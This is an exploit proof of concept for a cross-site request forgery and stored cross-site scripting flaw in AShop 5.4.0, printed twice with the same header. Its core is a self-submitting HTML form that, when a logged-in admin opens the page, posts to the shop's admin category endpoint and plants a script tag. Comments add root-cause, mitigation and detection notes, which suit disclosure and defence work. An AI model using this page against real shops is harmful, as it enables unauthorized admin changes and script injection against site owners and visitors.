##########################################
# Exploit Title: AShop 5.4.0 CSRF/XSS Vulnerability
# Date: 23-03-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ashopsoftware.com/
# Software Link: http://sourceforge.net/projects/ashop/
# Category: webapps/php
# Version: 5.4.0
##########################################
# Exploit/PoC
<!-- PoC page for the advisory above: a cross-site request forgery (CSRF)
     that plants a stored cross-site scripting (XSS) payload in a category name.
     Root cause as reported: admin/addcategory.php accepts a state-changing POST
     whose only fields are the four hidden inputs below; no anti-CSRF token and
     no origin check is among them, so any page the victim loads can issue it.
     Mitigation: require a per-session CSRF token that the server verifies on
     every admin write, mark the session cookie SameSite=Lax/Strict and check
     Origin/Referer on admin POSTs, and HTML-escape the category name on output
     so markup in "name" is rendered as text.
     Detection: category-creation requests to the admin path whose Origin or
     Referer is not the shop's own host. -->
<html>
<!-- onload submits the form as soon as the page is rendered, so a logged-in
     admin who merely opens this page sends the request; it relies on the
     browser attaching the existing admin session cookie. -->
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/addcategory.php">
<input type="hidden" name="cat" value="0">
<!-- "name" carries the XSS payload; the advisory reports it is stored and
     later rendered unescaped. The sink is not visible on this page, so confirm
     against the affected version before treating the XSS half as verified. -->
<input type="hidden" name="name" value="<script>alert(document.cookie)</script>"/>
<input type="hidden" name="nlanguage" value="any"/>
<input type="hidden" name="description" value="tst"/>
</form>
</body>
</html>
# Exploit Title: AShop 5.4.0 CSRF/XSS Vulnerability
# Date: 23-03-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ashopsoftware.com/
# Software Link: http://sourceforge.net/projects/ashop/
# Category: webapps/php
# Version: 5.4.0
##########################################
# Exploit/PoC
<!-- Duplicate of the PoC above (same header, same form). CSRF against
     admin/addcategory.php: the POST carries only the four hidden fields below,
     with no anti-CSRF token or origin check, and the "name" field holds a
     script tag the advisory reports is stored and rendered unescaped (stored
     XSS; the sink is not shown here).
     Mitigation: server-verified per-session CSRF token on admin writes,
     SameSite session cookie plus Origin/Referer validation, and output
     escaping of the category name. -->
<html>
<!-- Auto-submit on load: a logged-in admin opening this page sends the
     request with their session cookie attached. -->
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/addcategory.php">
<input type="hidden" name="cat" value="0">
<input type="hidden" name="name" value="<script>alert(document.cookie)</script>"/>
<input type="hidden" name="nlanguage" value="any"/>
<input type="hidden" name="description" value="tst"/>
</form>
</body>
</html>
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//for use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.